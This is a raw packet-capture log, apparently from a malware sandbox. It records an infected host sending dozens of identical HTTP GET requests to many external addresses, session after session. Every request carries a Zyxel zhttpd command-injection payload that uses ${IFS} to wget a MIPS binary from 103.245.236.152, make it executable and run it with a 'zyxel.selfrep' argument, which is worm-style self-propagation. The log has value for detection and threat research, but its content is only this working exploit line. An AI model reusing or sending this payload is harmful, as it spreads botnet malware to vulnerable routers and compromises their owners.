                                            Jan 14, 2024 15:50:26.202676058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            804192.168.2.235981837.147.75.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202702045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            805192.168.2.2357142126.171.55.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202719927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            806192.168.2.2356950123.190.188.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202755928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            807192.168.2.2347776205.58.181.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.204415083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            808192.168.2.2357258151.168.52.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.204447031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            809192.168.2.2347184105.99.108.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.204468966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            810192.168.2.234226497.195.193.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.204509020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            811192.168.2.235325684.6.251.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210733891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            812192.168.2.2340560210.220.59.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210742950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            813192.168.2.2356822206.67.132.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210762024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            814192.168.2.235907857.44.245.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210782051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            815192.168.2.2349744179.238.154.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210830927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            816192.168.2.234842234.183.215.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210846901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            817192.168.2.234707831.150.40.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210871935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            818192.168.2.234931062.211.251.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210911989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            819192.168.2.235386491.153.123.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210949898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            820192.168.2.2346894109.147.239.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210963964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            821192.168.2.2349386197.84.104.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210995913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            822192.168.2.2337988104.220.38.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.210998058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            823192.168.2.234771461.230.92.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211034060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            824192.168.2.2352968138.151.8.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211057901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            825192.168.2.2337192204.228.72.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211081028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            826192.168.2.2346276143.121.192.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211103916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            827192.168.2.235005848.119.121.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211141109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            828192.168.2.2345304160.253.107.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211174965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            829192.168.2.234429854.225.189.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211177111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            830192.168.2.2352086180.214.182.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211191893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            831192.168.2.234905813.254.213.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211240053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            832192.168.2.233836052.237.111.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211275101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            833192.168.2.2355088109.15.48.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211281061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            834192.168.2.2356138148.227.137.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211328030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            835192.168.2.23436329.243.206.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211349010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            836192.168.2.2345846207.33.213.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211390018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            837192.168.2.2333772161.104.110.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211402893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            838192.168.2.233895420.75.215.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211456060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            839192.168.2.234534047.166.66.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211473942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            840192.168.2.233818475.97.212.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211499929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            841192.168.2.235777267.191.2.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211529016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            842192.168.2.234276840.9.241.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211540937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            843192.168.2.23331141.210.87.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211551905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            844192.168.2.2341796220.248.191.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211615086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            845192.168.2.2359380115.170.74.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211615086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            846192.168.2.234920684.210.193.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211630106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            847192.168.2.235623817.207.2.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211675882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            848192.168.2.2354734142.113.240.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211703062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            849192.168.2.233594842.17.77.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211714029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            850192.168.2.2338586155.25.11.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211734056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            851192.168.2.2356772150.65.214.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211770058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            852192.168.2.233724217.89.105.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211790085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            853192.168.2.2340026213.100.196.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211828947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            854192.168.2.2357986213.253.68.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211854935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            855192.168.2.234703896.106.49.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211878061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            856192.168.2.234542298.235.49.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211910963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            857192.168.2.2347008207.247.88.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211939096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            858192.168.2.2337664159.168.139.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211967945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            859192.168.2.2340836217.224.248.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.211977959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            860192.168.2.234033488.11.143.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212007999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            861192.168.2.236037089.103.40.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212028027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            862192.168.2.2337364125.82.20.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212048054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            863192.168.2.2340652162.137.202.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212081909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            864192.168.2.2338376159.66.183.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212110043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            865192.168.2.2335348120.50.235.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212127924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            866192.168.2.2344066121.153.239.129443
                                            TimestampBytes transferredDirectionData
